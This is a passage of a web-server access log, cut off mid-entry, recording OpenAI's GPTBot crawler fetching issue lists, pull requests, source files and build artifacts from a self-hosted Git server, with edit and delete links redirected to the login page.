-[17/Feb/2026:18:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:38:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10092] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1513] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:18:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" -[17/Feb/2026:18:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?files=PostgresMonitor" [Client 74.7.227.38] [Length 17079] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:18:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71842] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" -[17/Feb/2026:18:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:18:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19157] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11852] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12311] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12311] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fDependInfo.cmake" [Client 74.7.227.38] [Length 23970] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 